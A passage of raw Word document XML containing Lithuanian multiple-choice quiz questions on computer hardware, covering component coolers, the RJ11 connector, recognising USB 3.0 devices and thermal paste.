          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidR="00DD0FB2" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://www.deepcool.com/product/dcoolingaccessory/vga/2013-12/45_604.shtml</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00DD0FB2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225F0FA8" w14:textId="4CA52224"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a) </w:t>
      </w:r>
      <w:r w:rsidR="008F4F2D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>rocesoriaus aušintuv</w:t>
      </w:r>
      <w:r w:rsidR="00EC455C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidR="00F44D72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E86A10" w14:textId="1B05A9B6"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b) </w:t>
      </w:r>
      <w:r w:rsidR="008F4F2D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>peratyviosios atminties aušintuv</w:t>
      </w:r>
      <w:r w:rsidR="00EC455C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidR="00F44D72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7639ACF8" w14:textId="64E9B279"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c) </w:t>
      </w:r>
      <w:r w:rsidR="008F4F2D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>aizdo plokštės aušintuv</w:t>
      </w:r>
      <w:r w:rsidR="00EC455C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidR="00F44D72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6344F8F9" w14:textId="77777777" w:rsidR="0003195F" w:rsidRPr="005A5C28" w:rsidRDefault="0003195F" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DAD9909" w14:textId="37E3D3EB" w:rsidR="00326039" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Kam kompiuteryje </w:t>
      </w:r>
      <w:r w:rsidR="008F4F2D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">reikalinga </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>RJ11 jungtis?</w:t>
      </w:r>
      <w:r w:rsidR="00F44D72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D4BA53" w14:textId="1E90AE9D"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a) </w:t>
      </w:r>
      <w:r w:rsidR="008F4F2D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00F44D72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">rijungti </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>tinklo kabel</w:t>
      </w:r>
      <w:r w:rsidR="00F44D72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>į;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FCC3A4" w14:textId="7A41BFC4"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b) </w:t>
      </w:r>
      <w:r w:rsidR="008F4F2D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="00F44D72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">ompiuteryje </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>nėra tokios jungties</w:t>
      </w:r>
      <w:r w:rsidR="00F44D72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EA3AFA" w14:textId="46BE7B81"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c) </w:t>
      </w:r>
      <w:r w:rsidR="008F4F2D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00F44D72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">ateikti </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>beviel</w:t>
      </w:r>
      <w:r w:rsidR="00F44D72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>į</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ryš</w:t>
      </w:r>
      <w:r w:rsidR="00F44D72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>į.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EBA259" w14:textId="77777777" w:rsidR="0003195F" w:rsidRPr="005A5C28" w:rsidRDefault="0003195F" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39E55ED7" w14:textId="27F0B8E3" w:rsidR="00326039" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r w:rsidR="00EC455C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Iš ko galima spręsti</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>, kad atmintinė ar nešiojamas kietasis diskas turi palaikyti USB 3.0?</w:t>
      </w:r>
      <w:r w:rsidR="00DF24A2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7425AA" w14:textId="7E7A142D" w:rsidR="00326039" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>a)</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Y</w:t>
      </w:r>
      <w:r w:rsidR="00F44D72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">ra </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>mėlynos spalvos</w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> kištukas</w:t>
      </w:r>
      <w:r w:rsidR="00F44D72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D5B025" w14:textId="31A2CBA2"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b) </w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Y</w:t>
      </w:r>
      <w:r w:rsidR="00F44D72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">ra </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>prierašas – „Super Speed“</w:t>
      </w:r>
      <w:r w:rsidR="00F44D72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D3368F" w14:textId="556094B9" w:rsidR="00326039" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="00213BD9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">bu </w:t>
      </w:r>
      <w:r w:rsidR="00DF24A2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>atsakymai</w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> teisingi</w:t>
      </w:r>
      <w:r w:rsidR="00F44D72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BD3B5D" w14:textId="77777777" w:rsidR="0003195F" w:rsidRPr="005A5C28" w:rsidRDefault="0003195F" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EE0F1DA" w14:textId="5A8C1891" w:rsidR="00326039" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>8. Koki</w:t>
      </w:r>
      <w:r w:rsidR="006F04BD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> priemonę</w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>/detalę</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> reikia naudoti</w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>/įdiegti į kompiuterį, kad</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>padid</w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">ėtų </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>temperatūros pralaidumo varž</w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> tarp procesoriaus ir aušintuvo</w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>, o</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>aušintuvas gautų daugiau</w:t>
      </w:r>
      <w:r w:rsidR="0051005B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">temperatūros ir galėtų greičiau </w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>atvėst</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="00DF24A2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AB133B" w14:textId="177EE1B3"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a) </w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ermopast</w:t>
      </w:r>
      <w:r w:rsidR="00DF24A2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ą;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0DB2E0" w14:textId="57689783"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b) </w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>titinkamą aušintuvą</w:t>
      </w:r>
      <w:r w:rsidR="00DF24A2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5493F957" w14:textId="629D3353"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c) </w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00DF24A2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>eisingi abu atsakymai.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B34802" w14:textId="77777777" w:rsidR="0003195F" w:rsidRPr="005A5C28" w:rsidRDefault="0003195F" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BD160C3" w14:textId="334B8B27" w:rsidR="00326039" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>9. Montuo</w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>dami</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>operatyviąją atmintį</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>turime 4 lizdus. Du</w:t>
      </w:r>
      <w:r w:rsidR="00D762EF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> lizdai</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF24A2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>pažymėti</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>vien</w:t>
      </w:r>
      <w:r w:rsidR="00DF24A2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
